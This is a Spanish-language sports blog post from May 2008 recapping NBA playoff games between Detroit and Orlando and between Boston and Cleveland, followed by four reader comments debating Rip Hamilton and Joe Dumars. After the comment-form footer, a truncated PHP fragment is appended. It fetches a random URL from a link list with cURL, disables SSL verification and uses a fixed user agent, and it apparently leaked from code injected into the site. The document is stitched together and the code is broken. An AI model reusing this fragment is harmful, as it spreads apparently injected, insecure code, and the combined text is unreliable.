Tan cerca, tan lejos…

11 de May de 2008 por xapa_croack

By xapa_croack&TheDeerHunter

Tan cerca y tan lejos (DET 90 – ORL 89)

Nunca habían tenido, los Magic, tan cerca la posibilidad de poner a Pistons contra las cuerdas. Sin Billups lesionado, su mejor hombre durante estos Playoffs, y la dinámica de los dos últimos partidos culminada con la derrota “fácil” del último a nadie le hubiera extrañado volver a Detroit con un empate en la eliminatoria. Sin embargo, la casta de campeón que tiene este equipo no deja de sorprender después de tantos años que los conocemos y cuanto peor lo han tenido más muestras de talento han dado.

Anoche fue el turno de Rip Hamilton. Brilló por encima de todos con un partido sensacional. Es curioso lo de este hombre. Nunca se habla de él como superestrella de esta liga. Por camisetas vendidas probablemente no lo es, pero a la chita callando discute los números de gente como Isiah Thomas y Joe Dumars y pocos escoltas en activo le llegan a la suela de los zapatos. Es uno de esos que todo lo hace bien, y lo que no puede hacer bien no lo intenta. Pero anoche tenía que hacer más cosas y las hizo, como lo hacen los grandes.Pero no fue el único, a pocos se nos ocurriría darle el balón a Tayshaun Prince para ganar un partido y qué pocos problemas tuvo para asumir la responsabilidad. Otro artista del tapado. Desde aquella defensa a T-Mac es pieza clave de las cinco finales de conferencia (y del anillo) que acumula Pistons (se dice pronto). Defensor de libro, sin necesidad de rebajarse al fango, y atacante correcto. Anoche se llevó un premio merecido a su oscuro trabajo.

Si hablamos de defensa no podemos dejar de mencionar al juego interior. Le va a costar olvidar a Dwight Howard las lecciones que le están dando estos días. Anoche se quedó en 8 puntos y 3/12. Y lo que te rondaré, morena…

Con esta dolorosa última canasta la eliminatoria queda vista para sentencia. Orlando ha dado la cara pero dudamos que se pueda recuperar moralmente de este golpe. Es difícil imaginar que puedan ganar tres partidos seguidos ni siquiera reservando a Billups en todos ellos. Han demostrado que son un buen equipo, pero como muchos preveían le falta todavía subir un nivel para medirse a equipos de la altura de su actual rival. Es una lástima, porque hacen un juego bastante bonito… pero es un equipo joven y tiene margen de mejora. Rashad Lewis debería tener mucho que decir al respecto. Veremos…

RESURECCBRON: (BOS 84 – CLE 108)

La cruzada fuera del Boston Garden continua para los verdes, en la primera ronda se tuvieron que ir al séptimo partido ante los octavos del este Atlanta, y ayer en el primer partido fuera de casa, la historia continua. Parece que la intensidad defensiva se pierde y el factor afición es demasiada presión para el “Big Three ”. Doc Rivers deberá motivar a sus pupilos para no llegar todas las eliminatorias al match ball séptimo. Los célticos llevan en casa un 6-0 y fuera de casa 0-4, en la liga regular fue lo contrario ya que fueron el mejor equipo fuera de casa con un 31-10.

Lebron siguió tirando, aunque sigue bajando números de la primera ronda (casi 30 puntos por partido), aunque ayer tuvo el día con mejor porcentaje, 5 de 16, de la segunda ronda y se dedico más a jugar en equipo (8 asistencias) y sus compañeros lo notaron… gran actuación del tatuado Delonte West, el ex verde se tomó su propia venganza con 21 puntos (4 triples) y 7 asistencias, Joe Smith 17 puntos con un 7 de 8 en tiros de campo. También estuvo acertado Wally con 16 puntos (14 en la primera parte), El dudoso con molestias en el oido Big Ben hizo un 9-9. Todos ellos fichados antes del cierre de trades de esta temporada.

Un parcial en el primer cuarto de los Cavs 32-13 fue suficiente para poner el primer punto para los locales, ya que nunca se acercaron los célticos en el marcador para inquietar al rival y fueron dosificando esa ventaja. Los locales pretender ser el 14 equipo en la NBA que bate un 2-0 en contra, pero ellos ya tienen practica en eso ya que el año pasado consiguieron ganar a los Pistons con un 2-0 en contra.

El 13 de 58 o 22.4% de tiros de campo de Lebron continua dando que hablar a los columnistas americanos ya que es el peor porcentaje de un jugador en los 3 primeros partidos de una ronda desde 1977, pero a Lebron parece que solo le importa la victoria. Mientras, el trío de superestrellas de Massachussets combinaron 41 puntos, KG 17 y 9 rebotes, Pierce con un gran trabajo defensivo sobre el King 14 puntos y Ray Allen 10 puntos. Mientras en los Cavs los suplentes fueron decisivos, en los célticos no hubo gran cosa, Posey 11 puntos y Cassell 1 con un 0-6 en tiros.

La noche del lunes 12 en Cleveland veremos el 4 partido de las semifinales de conferencia a las 2 de la madrugada.

Por cierto, una curiosidad. Esta tarde que se decide el titulo en la premier tendrá un pique que afectara a esta eliminatoria ya que Big Z es un seguidor acérrimo del Manchester y la estrella céltica Garnett es del Chelsea, aunque Ilgauskas ha declarado que es un falso fan del Chelsea. Aunque no sabemos el motivo suponemos que sera desde que visitó Londres. El 21 de Mayo en la final de Champions continuará el pique.

Comenta

4 comentarios a esta entrada

  1. Gallis dice:
    #1

    Ufff, cuantas dudas dejan los Cavs y los Celtics…

    Por parte de los Cavs me sigue pareciendo que van muy justitos, mientras Lebron este así. Ayer un poco mejor, pero de momento no da pruebas de que en Boston pueda mejorar la cosa. Hombre, si Delonte y Smith siguen así, sería una gran noticia…

    Pero la mejor noticia para los Cavs es que, a este paso, por lo menos jugarán 7 partidos, cosa que con unos Celtics normales no debería pasar, viendo el nivel de los Lebrones (y de Lebron, claro)…pero vaya, lo de los Celtics fuera de casa empieza a ser preocupante. Rondo parece lo que es, un base todavía muy inexperto y limitado, Allen no está y lo peor, no se le espera, Pierce directamente dimite, Posey si el resto no funciona no sirve de mucho y Cassell con el viento a favor es muy bueno, pero con el viento en contra es muy viejo…y el resto, pues en fin. Sigo pensando que ganar en Boston les da para plantarse en la final, pero dejan muchas, muchas dudas…

    Y hombre, si hay un séptimo y a Lebron le da por parecerse al de Detroit del año pasado, ojito…

    En cuanto a la otra eliminatoria, pues de acuerdo en todo. Lo de los Pistons tiene un mérito brutal. Y es cierto que Hamilton y Priince son tan tapados como buenos, jeje…

    A Orlando le toca esperar, pero si Lewis se asienta y Nelson consigue ser más regular, seran un equipo muy importante varios años…eso, siempre y cuando lo del turco no haya sido un espejismo.

    Aunque siempre quedará la duda de que hubiera pasado en este enfrentamiento si aquel reloj hubiera funcionado bien…

      Citar

  2. TheDeerHunter dice:
    #2

    A mí hay algo que todavía no logro entender.
    Joe Smith llevaba un año en un buen estado de forma en Bulls. Se hace el traspaso y, yo que pensaba era la mejor carta que pillaba Cleveland y no le dan ni bola.
    Por primera vez anoche, hace un buen número de minutos y los aprovecha bien.

    En realidad, cromo por cromo tiene más profunidad Cleveland… pero es que están aprovechando tan mal sus opciones que vaya. Pero si Lebrón logra despertar…

      Citar

  3. telekoman dice:
    #3

    Por cierto, lo de comparar a Hamilton con Dumars me parece un poco exagerado. A lo mejor es que le tengo en mucha estima al bueno de Joe, pero me parece uno de los jugadores más inteligentes que ha pisado una cancha NBA, y con muchísima calidad y capacidad de sacrificio. RIP no llega a eso ni de coña.

      Citar

  4. TheDeerHunter dice:
    #4

    En realidad, particularmente considero a Hamilton uno de los más jugadores más inteligentes que he podido ver jugar, no se si a la altura de Joe Dumars que me encantaba, por cierto. Eso es muy subjetivo.
    En cualquier caso yo no me refería a nada opinable. Hacía referencia a números concretos, indiscutiles, estando Hamilton ahora mismo a punto de pasar a Isiah Thomas en la clasificación de puntos anotados en play-offs (cágate lorito) y muy por encima en esa estadística del crack Dumars. Puedes comprobarlo tú mismo, son estadísticas públicas.
    Obviamente puede resultar injusto comparar un escolta con un base y yo no trataba de hacerlo. Simplemente reflejaba lo muy subestimado que está Hamilton frente a la categoría de jugador que es pudiendo estar a la altura de jugadores legendarios como los que hemos nombrado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>